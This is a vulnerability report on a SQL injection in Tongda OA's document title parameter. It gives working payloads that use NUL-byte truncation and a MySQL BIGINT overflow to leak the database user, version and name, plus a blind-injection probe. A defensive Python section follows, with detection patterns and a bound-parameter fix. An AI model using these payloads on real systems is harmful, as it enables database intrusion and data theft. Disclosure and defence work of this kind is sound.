### Brief description:

Although the single quote is not filtered here, the filtering still has to be bypassed. Two tricks are involved~ Hoping for the front page~

### Detailed description:

Vendor: Tongda (通达信科)

Test demo address: `**.**.**.**/`

Injection URL:

```
**.**.**.**/general/document/index.php/recv/register/register_for/?tid=&title=1
```

The `title` parameter is injectable.

We append a single quote `'`:

```
**.**.**.**/general/document/index.php/recv/register/register_for/?tid=&title=1'
```

![1019-30.png](https://images.seebug.org/upload/201510/20005730c9d2997e22c507a0726b90a3df46f4ad.png)

Returned:

```
**.**.**.**/general/document/index.php/recv/register/register_for/?tid=&title=1'
```

Ordinary injection does not work, and `union` cannot be used either: either it is filtered, or the failing SQL statement is simply printed out, for example:

```
**.**.**.**/general/document/index.php/recv/register/register_for/?tid=&title=1' and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)--
```

![1019-31.png](https://images.seebug.org/upload/201510/200100047b1b7cf8d22d2fe3c17dbedc0cf54ed7.png)

The other filtered spots are not shown one by one.

Construction tricks~

Trick one: comments

Ordinary comment sequences are all filtered, such as:

```
-- # /*
```

Here a trick is used: truncate the statement directly with

```
;%00
```

Trick two: error-based injection using a MySQL feature

When an ordinary error-based payload is executed it cannot leak any information; the trick below can leak database information:

```
(!(select*from(select user())x)-~0)
```

This mainly relies on MySQL's arithmetic behaviour to cause an integer overflow. Here,

```
~0 is the complement of 0, which is the maximum value
```

![1019-32.png](https://images.seebug.org/upload/201510/20010947a57cea82d90fff4a848c65e0109c6730.png)

Secondly,

```
!(select*from(select user())x) performs an operation on the queried result
```

The first result minus a huge number causes an overflow and triggers an error!!!

So the injection EXP is:

```
**.**.**.**/general/document/index.php/recv/register/register_for/?tid=&title=1%' and (!(select*from(select user())x)-~0)>1;%00
```

![1019-33.png](https://images.seebug.org/upload/201510/20011623d52c9d9898ef8af3bf201a32f1ebe07d.png)

```
SQL语句执行错误 #1690: BIGINT UNSIGNED value is out of range in '((not((select 'root@**.**.**.**' from dual))) - ~(0))'
```

Got the user:

```
root@**.**.**.**
```

If any part is missing it does not succeed.

Likewise for the other information.

version:

```
**.**.**.**/general/document/index.php/recv/register/register_for/?tid=&title=1%' and (!(select*from(select version())x)-~0)>1;%00
```

![1019-33-version.png](https://images.seebug.org/upload/201510/200117486156b420441acb28364b10aebe03c5cf.png)

```
SQL语句执行错误 #1690: BIGINT UNSIGNED value is out of range in '((not((select '5.5.36-enterprise-commercial-advanced-log' from dual))) - ~(0))'
```

Database version:

```
5.5.36-enterprise-commercial-advanced-log
```

database:

```
**.**.**.**/general/document/index.php/recv/register/register_for/?tid=&title=1%' and (!(select*from(select database())x)-~0)>1;%00
```

![1019-33-database.png](https://images.seebug.org/upload/201510/2001191388ea48461d88c83dc86eeae9a0edcdcf.png)

```
SQL语句执行错误 #1690: BIGINT UNSIGNED value is out of range in '((not((select 'td_oa' from dual))) - ~(0))'
```

Got the database:

```
td_oa
```

### Proof of vulnerability:

![1019-33-database.png](https://images.seebug.org/upload/201510/2001191388ea48461d88c83dc86eeae9a0edcdcf.png)

![1019-33-version.png](https://images.seebug.org/upload/201510/200117486156b420441acb28364b10aebe03c5cf.png)

![1019-33.png](https://images.seebug.org/upload/201510/20011623d52c9d9898ef8af3bf201a32f1ebe07d.png)

This point can also be exploited with blind injection, constructed like this:

```
**.**.**.**/general/document/index.php/recv/register/register_for/?tid=&title=1%' and 1=1 and 'a%'='a
```

![1019-34.png](https://images.seebug.org/upload/201510/2001250602cb77e799a288974e96684eeb3cbef8.png)
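Seen from the defending side, both tricks in this report leave distinctive traces: the `;%00` truncation puts a NUL byte into the query string, and the `(!(select ...)-~0)` overflow makes MySQL raise error #1690, whose message echoes the subquery result back. The Python below is an added example, not code from the report or from Tongda OA: it flags both patterns in constructed access-log lines, pulls the echoed literal out of constructed error-log lines, and shows the bound-parameter query (sqlite3 standing in for MySQL; the `document` table and its columns are assumed) under which the same payload is just an inert string. The sample log lines and the `root@db-host-placeholder` value are all constructed.

```python
"""Defender-side helpers for the two tricks in the report: NUL-byte truncation
and BIGINT UNSIGNED overflow error leakage. Added example, not Tongda OA code."""
import re
import sqlite3
from urllib.parse import unquote_plus, urlsplit

# Constructed access-log lines (METHOD path HTTP/version); not from the report.
SAMPLE_ACCESS_LOG = [
    "GET /general/document/index.php/recv/register/register_for/?tid=&title=1 HTTP/1.1",
    "GET /general/document/index.php/recv/register/register_for/?tid=&title=1%27 HTTP/1.1",
    "GET /general/document/index.php/recv/register/register_for/?tid=&title=1%27%20and%20(select%201)-- HTTP/1.1",
    "GET /general/document/index.php/recv/register/register_for/?tid=&title=1%25%27%20and%20"
    "(!(select*from(select%20user())x)-~0)>1;%00 HTTP/1.1",
    "GET /general/document/index.php/recv/register/register_for/?tid=&title=Quarterly%20report HTTP/1.1",
]

# Constructed application error-log lines; the host in the literal is a placeholder.
SAMPLE_ERROR_LOG = [
    "2015-10-20 00:11:23 SQL语句执行错误 #1690: BIGINT UNSIGNED value is out of range in "
    "'((not((select 'root@db-host-placeholder' from dual))) - ~(0))'",
    "2015-10-20 00:11:24 SQL语句执行错误 #1064: You have an error in your SQL syntax",
]

# --- 1. Request-side detection: (label, regex over the URL-decoded query string)
RULES = [
    # `;%00` decodes to a NUL byte; a NUL has no legitimate use in a query string
    # and is what the report uses in place of the filtered --, # and /* comments.
    ("nul-truncation", re.compile(r"\x00")),
    # `~0` is MySQL's maximum BIGINT UNSIGNED; `... - ~0` is the overflow that
    # surfaces a subquery result inside error #1690.
    ("bigint-overflow", re.compile(r"-\s*~\s*0")),
    # The negated derived-table wrapper `!(select*from(select ...)x)`.
    ("negated-subquery", re.compile(r"!\s*\(\s*select|select\s*\*\s*from\s*\(\s*select", re.I)),
    # A quote followed by and/or: the boolean probe from the proof section.
    ("quote-boolean", re.compile(r"['\"]\s*(and|or)\s+", re.I)),
]


def decoded_query(log_line):
    """Return the URL-decoded query string of a 'METHOD /path?query HTTP/x' line."""
    parts = log_line.split()
    if len(parts) < 2:
        return ""
    return unquote_plus(urlsplit(parts[1]).query)


def scan_access_log(lines):
    """Map each suspicious log line to the list of rule labels it triggers."""
    findings = {}
    for line in lines:
        query = decoded_query(line)
        hits = [label for label, rx in RULES if rx.search(query)]
        if hits:
            findings[line] = hits
    return findings


# --- 2. Database-side detection: the error text the overflow produces
ERROR_1690 = re.compile(r"#1690:\s*BIGINT UNSIGNED value is out of range in '(.*)'")


def leaked_values(error_log_lines):
    """Return the string literals MySQL echoed inside #1690 messages.

    A non-empty result means an overflow payload reached the database; if the
    application also shows that message to the client, it leaks query results."""
    leaked = []
    for line in error_log_lines:
        match = ERROR_1690.search(line)
        if match:
            leaked.extend(re.findall(r"select '([^']*)' from dual", match.group(1)))
    return leaked


# --- 3. The fix: bind the value instead of splicing it into the SQL text
def demo_db():
    """In-memory stand-in for the OA document table (schema is assumed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE document (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO document (title) VALUES (?)",
                     [("1 quarterly report",), ("Budget 2015",)])
    return conn


def safe_title_lookup(conn, title):
    """Prefix search by title with a bound parameter: the payload is a plain literal,
    so there is no truncation, no overflow and no error to read results from."""
    cur = conn.execute("SELECT id FROM document WHERE title LIKE ?", (title + "%",))
    return [row[0] for row in cur.fetchall()]


if __name__ == "__main__":
    for line, hits in scan_access_log(SAMPLE_ACCESS_LOG).items():
        print(hits, line)
    print("echoed by #1690:", leaked_values(SAMPLE_ERROR_LOG))
    conn = demo_db()
    print(safe_title_lookup(conn, "1"))
    payload = decoded_query(SAMPLE_ACCESS_LOG[3]).split("title=", 1)[1]
    print(safe_title_lookup(conn, payload))
```

Run it directly to print the findings. The request-side rules are heuristics: a lone quote in a free-text field is deliberately not flagged (too noisy for a title), whereas the error-side check is the higher-confidence signal, since a #1690 overflow message wrapped around a user-supplied value does not arise from normal use. The root fix is the bound parameter: neither a blacklist of `--`, `#` and `/*` nor a filter on error messages closes the hole.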